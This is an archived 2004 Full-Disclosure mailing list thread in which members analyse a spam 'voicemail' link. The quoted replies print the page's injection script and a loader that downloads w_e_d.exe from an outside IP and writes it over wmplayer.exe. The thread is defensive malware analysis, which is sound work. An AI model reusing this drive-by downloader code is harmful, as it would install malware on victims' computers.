lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Message-ID: <40D0908F.1000609@joesmith.homeip.net>
From: joe at joesmith.homeip.net (joe smith)
Subject: spamming trojan?

I used PE Explorer. 

Looks the june4.exe is some kind of spyware.  It reference to another 
site "cjdra.com", possibly uploading user information there. 

I just started learning assembly, please pardon my lack of knowledge on 
reverse engineering.

J

Michael Gargiullo wrote:

>On Wed, 2004-06-16 at 13:41, joe smith wrote:
>  
>
>>The file is UPX packed and withit the file there is another "GET" 
>>pointing to "http://219.234.95.124/june4.exe"
>>
>>J
>>    
>>
>
>Like those Chinese stacking dolls...  How'd you unpack it? 
>
>
>  
>
>>Michael Gargiullo wrote:
>>
>>    
>>
>>>On Wed, 2004-06-16 at 08:23, Geo. wrote:
>>> 
>>>
>>>      
>>>
>>>>Received a spam this morning claiming I have a voicemail with the link
>>>>(warning do not click the link)
>>>>
>>>>http:-//www-1voicemailbox-net/voicemail/ (dashes added by me)
>>>>
>>>>which brings up a frames based page with one of the frames containing this
>>>>
>>>>        
>>>>
>
>  
>
>>>>   function InjectedDuringRedirection(){
>>>>
>>>>showModalDialog('md.htm',window,"dialogTop:-10000\;dialogLeft:-10000\;dialo
>>>>gHeight:1\;dialogWidth:1\;").location="javascript:'<SCRIPT
>>>>SRC=\\'http://219.234.95.124/vbox/shellscript_loader.js\\'><\/script>'";
>>>>
>>>>Anyone want to try and analyze what this thing is? It was spammed to about
>>>>30 addresses here this morning.
>>>>
>>>>Geo.
>>>>   
>>>>
>>>>        
>>>>
>>>Here's the contents:
>>>
>>>var x = new ActiveXObject("Microsoft.XMLHTTP"); 
>>>x.Open("GET", "http://219.234.95.124/vbox/w_e_d.exe",0);
>>>x.Send(); 
>>>
>>>var s = new ActiveXObject("ADODB.Stream");
>>>s.Mode = 3;
>>>s.Type = 1;
>>>s.Open();
>>>s.Write(x.responseBody);
>>>
>>>s.SaveToFile("C:\\Program Files\\Windows Media Player\\wmplayer.exe",2);
>>>location.href = "mms://";
>>>
>>>so whatever w_e_d.exe is...
>>>
>>>_______________________________________________
>>>Full-Disclosure - We believe in it.
>>>Charter: http://lists.netsys.com/full-disclosure-charter.html
>>>
>>> 
>>>
>>>      
>>>
>
>
>  
>


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ